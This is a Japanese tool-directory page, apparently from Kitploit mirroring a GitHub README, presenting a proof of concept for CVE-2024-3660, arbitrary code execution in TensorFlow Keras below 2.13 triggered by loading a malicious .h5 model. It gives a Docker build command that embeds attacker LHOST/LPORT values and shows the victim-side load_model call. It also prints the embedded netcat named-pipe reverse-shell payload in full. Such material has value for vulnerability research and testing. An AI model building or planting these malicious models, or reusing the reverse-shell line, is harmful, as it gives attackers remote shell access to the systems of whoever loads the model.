Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3660-PoC — CVE-2024-3660 の PoC。Keras における任意のコード実行。 | Kitploit
ツール/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
脆弱性分析エクスプロイトペネトレーションテストペイロード開発AIセキュリティバイナリエクスプロイト
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

CVE-2024-3660 の PoC。Keras における任意のコード実行。

リポジトリを見る
4151年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-3660 – TensorFlow Keras における悪意あるモデルによる任意コード実行

概要

CVE-2024-3660 は、TensorFlow の Keras フレームワークにおける任意コード実行の脆弱性で、バージョン < 2.13 に影響します。
攻撃者は、Python コードをモデル内(例:Lambda レイヤー経由)に埋め込むことができ、モデル読み込み時に自動的に実行されます。

脆弱な環境で悪意ある .h5 モデルファイルが読み込まれると、読み込みプロセスと同じ権限で任意のコマンドが実行されます。


影響を受けるバージョン

  • TensorFlow の Keras < 2.13.0
  • 以下の方法で読み込まれた Keras モデル:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

または、safe_mode がデフォルトで有効になっていない古い TensorFlow バージョン。

PoC の説明

この PoC は Docker ベースのビルドを使用して、リバースシェルペイロードを含む悪意ある hack.h5 モデルを生成します。 脆弱な TensorFlow バージョンでモデルが読み込まれると、攻撃者のマシンに接続します。


使用方法

1. 悪意あるモデルのビルドと抽出

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. 悪意あるモデルの読み込み(被害者側)

  • 脆弱な TensorFlow 環境(< 2.13)の場合:
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

ペイロード

  • 埋め込まれたペイロードは、リバースシェルに nc を使用します:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

参照

NVD CMU Oligo Secuirty

ツールをダウンロード